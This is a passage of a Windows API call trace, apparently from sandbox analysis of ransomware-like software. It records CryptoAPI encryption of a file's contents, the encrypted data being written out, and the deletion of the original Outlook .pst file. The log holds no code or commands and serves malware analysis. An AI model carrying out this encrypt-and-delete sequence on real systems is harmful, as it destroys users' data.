RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0085.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0085.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0085.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0085.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0085.407] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0085.407] CryptGetKeyParam (in: hKey=0x41abfc0, dwParam=0x7, pbData=0x43e2580, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2580*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0085.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0085.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0085.409] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0085.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0085.410] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0085.410] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0085.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0085.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0085.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0085.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0085.411] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0085.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0085.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0085.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0085.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0085.502] CryptEncrypt (in: hKey=0x41abfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x42400, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x42410) returned 1 [0085.502] CharLowerBuffW (in: lpsz="byte[271377]", cchLength=0xc | out: lpsz="byte[271377]") returned 0xc [0085.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0085.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0085.520] CryptEncrypt (in: hKey=0x41abfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x443f7c0*, pdwDataLen=0x144e538*=0x42400, dwBufLen=0x42410 | out: pbData=0x443f7c0*, pdwDataLen=0x144e538*=0x42410) returned 1 [0085.524] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0085.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0085.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0085.647] WriteFile (in: hFile=0x298, lpBuffer=0x4506008*, nNumberOfBytesToWrite=0x42410, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4506008*, lpNumberOfBytesWritten=0x144ef3c*=0x42410, lpOverlapped=0x0) returned 1 [0085.653] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0085.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0085.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0085.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca820, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0085.653] CryptDestroyKey (hKey=0x41abfc0) returned 1 [0085.653] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0085.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0085.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0085.653] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0085.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0085.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0085.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0085.653] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0085.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0085.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0085.653] CryptReleaseContext (hProv=0x41a47b0, dwFlags=0x0) returned 1 [0085.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0085.654] FreeLibrary (hLibModule=0x756e0000) returned 1 [0085.654] CloseHandle (hObject=0x258) returned 1 [0085.655] CloseHandle (hObject=0x298) returned 1 [0085.661] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", lpFilePart=0x0) returned 0x38 [0085.661] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst")) returned 0x2020 [0085.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0085.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0085.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0085.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0085.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0085.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0085.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0085.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0085.662] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0x41ac640 [0085.662] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst")) returned 1 [0085.665] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0 [0085.665] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4ae0 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0085.666] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0085.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0085.666] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 